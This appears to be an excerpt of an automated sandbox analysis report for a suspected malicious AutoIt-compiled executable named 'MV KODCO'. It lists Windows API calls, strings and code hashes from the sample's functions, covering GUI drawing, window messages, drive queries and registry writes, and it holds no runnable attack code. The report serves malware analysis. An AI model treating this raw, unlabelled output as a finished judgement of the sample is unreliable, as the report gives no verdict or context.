                                                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                          • String ID: $AutoIt v3$DISPLAY$static
                                                          • API String ID: 2211948467-2373415609
                                                          • Opcode ID: 19de3c33d0372dd77916eae30409a6b0ffc84ce371713bbbeb701b135ba8fbf0
                                                          • Instruction ID: acd702d981d081df58e9ff8b289a13da3ed7e70146f7605439f3aeafdd580e19
                                                          • Opcode Fuzzy Hash: 19de3c33d0372dd77916eae30409a6b0ffc84ce371713bbbeb701b135ba8fbf0
                                                          • Instruction Fuzzy Hash: 61027E75A00115EFDB14DFA5DD89EAE7BBAFF49310F008158F945AB2A1CB70AD41CBA0
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 0064D2DB
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0064D30C
                                                          • GetSysColor.USER32(0000000F), ref: 0064D318
                                                          • SetBkColor.GDI32(?,000000FF), ref: 0064D332
                                                          • SelectObject.GDI32(?,00000000), ref: 0064D341
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0064D36C
                                                          • GetSysColor.USER32(00000010), ref: 0064D374
                                                          • CreateSolidBrush.GDI32(00000000), ref: 0064D37B
                                                          • FrameRect.USER32(?,?,00000000), ref: 0064D38A
                                                          • DeleteObject.GDI32(00000000), ref: 0064D391
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0064D3DC
                                                          • FillRect.USER32(?,?,00000000), ref: 0064D40E
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0064D439
                                                            • Part of subcall function 0064D575: GetSysColor.USER32(00000012), ref: 0064D5AE
                                                            • Part of subcall function 0064D575: SetTextColor.GDI32(?,?), ref: 0064D5B2
                                                            • Part of subcall function 0064D575: GetSysColorBrush.USER32(0000000F), ref: 0064D5C8
                                                            • Part of subcall function 0064D575: GetSysColor.USER32(0000000F), ref: 0064D5D3
                                                            • Part of subcall function 0064D575: GetSysColor.USER32(00000011), ref: 0064D5F0
                                                            • Part of subcall function 0064D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0064D5FE
                                                            • Part of subcall function 0064D575: SelectObject.GDI32(?,00000000), ref: 0064D60F
                                                            • Part of subcall function 0064D575: SetBkColor.GDI32(?,00000000), ref: 0064D618
                                                            • Part of subcall function 0064D575: SelectObject.GDI32(?,?), ref: 0064D625
                                                            • Part of subcall function 0064D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0064D644
                                                            • Part of subcall function 0064D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0064D65B
                                                            • Part of subcall function 0064D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0064D670
                                                            • Part of subcall function 0064D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0064D698
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 3521893082-0
                                                          • Opcode ID: 68dc2dc177d74a26496c5a52fc3d69441104325a6b356b12cc15068a3ddaa474
                                                          • Instruction ID: 9f11de985b5a6fda7f7fa3d4bdf209c44ccb2e8d164c73eeb507a423fde3e3c7
                                                          • Opcode Fuzzy Hash: 68dc2dc177d74a26496c5a52fc3d69441104325a6b356b12cc15068a3ddaa474
                                                          • Instruction Fuzzy Hash: 5C919271908301BFCB119F64DC08E6BBBEAFF89325F101A19F562961E0D7B1D945CB92
                                                          APIs
                                                          • DestroyWindow.USER32 ref: 005FB98B
                                                          • DeleteObject.GDI32(00000000), ref: 005FB9CD
                                                          • DeleteObject.GDI32(00000000), ref: 005FB9D8
                                                          • DestroyIcon.USER32(00000000), ref: 005FB9E3
                                                          • DestroyWindow.USER32(00000000), ref: 005FB9EE
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0065D2AA
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0065D2E3
                                                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0065D711
                                                            • Part of subcall function 005FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005FB759,?,00000000,?,?,?,?,005FB72B,00000000,?), ref: 005FBA58
                                                          • SendMessageW.USER32 ref: 0065D758
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0065D76F
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0065D785
                                                          • ImageList_Destroy.COMCTL32(00000000), ref: 0065D790
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: a861f123a9380d5df28ebb4ae4f570197f8d41989eded9401c23cd541a30b015
                                                          • Instruction ID: 30f599b016230a3c4bb835dc0437cdb5536158bd244fa358f7340e405b4112f9
                                                          • Opcode Fuzzy Hash: a861f123a9380d5df28ebb4ae4f570197f8d41989eded9401c23cd541a30b015
                                                          • Instruction Fuzzy Hash: 4C12A230604206DFDB21CF24C984BB9BBE6FF49306F144569EA89CB692C775EC4ACB51
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 0062DBD6
                                                          • GetDriveTypeW.KERNEL32(?,0067DC54,?,\\.\,0067DC00), ref: 0062DCC3
                                                          • SetErrorMode.KERNEL32(00000000,0067DC54,?,\\.\,0067DC00), ref: 0062DE29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 8a7dae654ac2dcfeed054800cf82ede4b677446c20d54b5041dd120e84f6ea03
                                                          • Instruction ID: 48e8436c3a4298e37b245f4070c7650db9b92fc72191c3c2f457b4987288db66
                                                          • Opcode Fuzzy Hash: 8a7dae654ac2dcfeed054800cf82ede4b677446c20d54b5041dd120e84f6ea03
                                                          • Instruction Fuzzy Hash: E051C030208F62AFCB14DF10E881869B7A7FFA4345B214C1AF4879B7A5DA70D946DF42
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp
                                                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 1038674560-86951937
                                                          • Opcode ID: ed6c74c5ab354ac7ff9b5d0cad3903b87a7a1fda2368ad90fe0fe2668a6ea0d3
                                                          • Instruction ID: 4822588e15015390333465e5ef00ffe2d23adf969abcc75a6d24b6710c7aa7cc
                                                          • Opcode Fuzzy Hash: ed6c74c5ab354ac7ff9b5d0cad3903b87a7a1fda2368ad90fe0fe2668a6ea0d3
                                                          • Instruction Fuzzy Hash: 61812B30640256BBCB28AB65DD53FBF3F7ABF55301F044028FD4A6A1C2EB61DA06C294
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,0067DC00), ref: 00646449
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 3964851224-45149045
                                                          • Opcode ID: fc4c8ee8e2c91b1efa70bcec280dbb9794e174691b0eaa30b672b3bdafd95d4c
                                                          • Instruction ID: 5f2ff5fc47be3c0f6c42ac286e0df5d13bb1c6d304d9fd1d83549f96f530efe6
                                                          • Opcode Fuzzy Hash: fc4c8ee8e2c91b1efa70bcec280dbb9794e174691b0eaa30b672b3bdafd95d4c
                                                          • Instruction Fuzzy Hash: C8C16F302042468BCB04EF10C555AAE7BA7BF96344F04486DF9865B7A2DF25ED4BCB87
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 0064D5AE
                                                          • SetTextColor.GDI32(?,?), ref: 0064D5B2
                                                          • GetSysColorBrush.USER32(0000000F), ref: 0064D5C8
                                                          • GetSysColor.USER32(0000000F), ref: 0064D5D3
                                                          • CreateSolidBrush.GDI32(?), ref: 0064D5D8
                                                          • GetSysColor.USER32(00000011), ref: 0064D5F0
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0064D5FE
                                                          • SelectObject.GDI32(?,00000000), ref: 0064D60F
                                                          • SetBkColor.GDI32(?,00000000), ref: 0064D618
                                                          • SelectObject.GDI32(?,?), ref: 0064D625
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0064D644
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0064D65B
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0064D670
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0064D698
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0064D6BF
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0064D6DD
                                                          • DrawFocusRect.USER32(?,?), ref: 0064D6E8
                                                          • GetSysColor.USER32(00000011), ref: 0064D6F6
                                                          • SetTextColor.GDI32(?,00000000), ref: 0064D6FE
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0064D712
                                                          • SelectObject.GDI32(?,0064D2A5), ref: 0064D729
                                                          • DeleteObject.GDI32(?), ref: 0064D734
                                                          • SelectObject.GDI32(?,?), ref: 0064D73A
                                                          • DeleteObject.GDI32(?), ref: 0064D73F
                                                          • SetTextColor.GDI32(?,?), ref: 0064D745
                                                          • SetBkColor.GDI32(?,?), ref: 0064D74F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: bf2d97069065317eb0228870f627fdc6ad554c3d12cf8af85210d86f01f4b546
                                                          • Instruction ID: 46ce5a4c28df3ce3ad088e5e566e67a92acf0e09f0f3a5c740c3b070e99c6620
                                                          • Opcode Fuzzy Hash: bf2d97069065317eb0228870f627fdc6ad554c3d12cf8af85210d86f01f4b546
                                                          • Instruction Fuzzy Hash: 2D514C71E00208AFDF109FA4DC48EEEBB7AFF09324F115115F915AB2A1D7B19A40CB90
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0064B7B0
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0064B7C1
                                                          • CharNextW.USER32(0000014E), ref: 0064B7F0
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0064B831
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0064B847
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0064B858
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0064B875
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0064B8C7
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0064B8DD
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0064B90E
                                                          • _memset.LIBCMT ref: 0064B933
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0064B97C
                                                          • _memset.LIBCMT ref: 0064B9DB
                                                          • SendMessageW.USER32 ref: 0064BA05
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0064BA5D
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0064BB0A
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0064BB2C
                                                          • GetMenuItemInfoW.USER32(?), ref: 0064BB76
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0064BBA3
                                                          • DrawMenuBar.USER32(?), ref: 0064BBB2
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0064BBDA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: d8ca65700cc9c36ec16a3146c1ee175723484a3be3a5a5213bf4c30cb608c35a
                                                          • Instruction ID: e3e8164744711f2107f0449566a7bc66e84616e14878dc1a0d331e6804ff61a3
                                                          • Opcode Fuzzy Hash: d8ca65700cc9c36ec16a3146c1ee175723484a3be3a5a5213bf4c30cb608c35a
                                                          • Instruction Fuzzy Hash: 55E19C74900218ABDF20DF65CC84EEE7BBAFF05714F10915AF919AA290DB70DA42DF60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Foreground
                                                          • String ID: ACTIVE$ALL$CLASS$H+i$HANDLE$INSTANCE$L+i$LAST$P+i$REGEXPCLASS$REGEXPTITLE$T+i$TITLE
                                                          • API String ID: 62970417-2307376815
                                                          • Opcode ID: cb71d17d7f6b11a7b64bffc3253e3f2e78184f962dc25e45ebc626f130e69840
                                                          • Instruction ID: be612ea444818166eab426c3ed068d5ec9014cb895475cb3172a92418471e34c
                                                          • Opcode Fuzzy Hash: cb71d17d7f6b11a7b64bffc3253e3f2e78184f962dc25e45ebc626f130e69840
                                                          • Instruction Fuzzy Hash: 82D11A30504643ABCB08EF11C8959EABFB6BF95344F00491DF896576A1DB30E99ECBD1
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 0064778A
                                                          • GetDesktopWindow.USER32 ref: 0064779F
                                                          • GetWindowRect.USER32(00000000), ref: 006477A6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00647808
                                                          • DestroyWindow.USER32(?), ref: 00647834
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0064785D
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0064787B
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006478A1
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 006478B6
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006478C9
                                                          • IsWindowVisible.USER32(?), ref: 006478E9
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00647904
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00647918
                                                          • GetWindowRect.USER32(?,?), ref: 00647930
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00647956
                                                          • GetMonitorInfoW.USER32 ref: 00647970
                                                          • CopyRect.USER32(?,?), ref: 00647987
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 006479F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: b936c25324355b562007b9468d4d5ad7007769a2395ec17109e1b9eda547345b
                                                          • Instruction ID: ee299e5040379cd61d14fef6aa1eaf2dd0b5dd6b9c1705a9c981da85f0ebbee2
                                                          • Opcode Fuzzy Hash: b936c25324355b562007b9468d4d5ad7007769a2395ec17109e1b9eda547345b
                                                          • Instruction Fuzzy Hash: ECB19F71608341AFDB04DF65C948B6ABBE6FF88310F00891DF5999B291DB70EC05CBA6
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005FA939
                                                          • GetSystemMetrics.USER32(00000007), ref: 005FA941
                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 005FA96C
                                                          • GetSystemMetrics.USER32(00000008), ref: 005FA974
                                                          • GetSystemMetrics.USER32(00000004), ref: 005FA999
                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 005FA9B6
                                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 005FA9C6
                                                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 005FA9F9
                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 005FAA0D
                                                          • GetClientRect.USER32(00000000,000000FF), ref: 005FAA2B
                                                          • GetStockObject.GDI32(00000011), ref: 005FAA47
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 005FAA52
                                                            • Part of subcall function 005FB63C: GetCursorPos.USER32(000000FF), ref: 005FB64F
                                                            • Part of subcall function 005FB63C: ScreenToClient.USER32(00000000,000000FF), ref: 005FB66C
                                                            • Part of subcall function 005FB63C: GetAsyncKeyState.USER32(00000001), ref: 005FB691
                                                            • Part of subcall function 005FB63C: GetAsyncKeyState.USER32(00000002), ref: 005FB69F
                                                          • SetTimer.USER32(00000000,00000000,00000028,005FAB87), ref: 005FAA79
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                          • String ID: AutoIt v3 GUI
                                                          • API String ID: 1458621304-248962490
                                                          • Opcode ID: fa74f6c87694429ad0ba66a6e0dabf2bc9dacdf73073e264b2a5c633e0995008
                                                          • Instruction ID: 84cfc684cadaf229c70f25e4c67851cffbbe5e2268f801664dfb7d4f0f25a234
                                                          • Opcode Fuzzy Hash: fa74f6c87694429ad0ba66a6e0dabf2bc9dacdf73073e264b2a5c633e0995008
                                                          • Instruction Fuzzy Hash: 7EB17C71A0020AAFDB14DFA8CC45BAE7BB6FB09315F155229FA15E7290DB74A840CF52
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00643735
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0067DC00,00000000,?,00000000,?,?), ref: 006437A3
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 006437EB
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00643874
                                                          • RegCloseKey.ADVAPI32(?), ref: 00643B94
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00643BA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 79970eebfbf406417ef8eff7c7b7d345950688bb623db33a493fd7b57a44af30
                                                          • Instruction ID: 38148174652a4adf7ad2461cb926f9c199d88ac455d7caaf3e41d8cc4a3860ce
                                                          • Opcode Fuzzy Hash: 79970eebfbf406417ef8eff7c7b7d345950688bb623db33a493fd7b57a44af30
                                                          • Instruction Fuzzy Hash: 0F025D756046529FCB14EF15C855A2EBBE6FF88720F05885DF9899B3A2CB30ED01CB85
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?), ref: 00646C56
                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00646D16
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: BuffCharMessageSendUpper
                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                          • API String ID: 3974292440-719923060
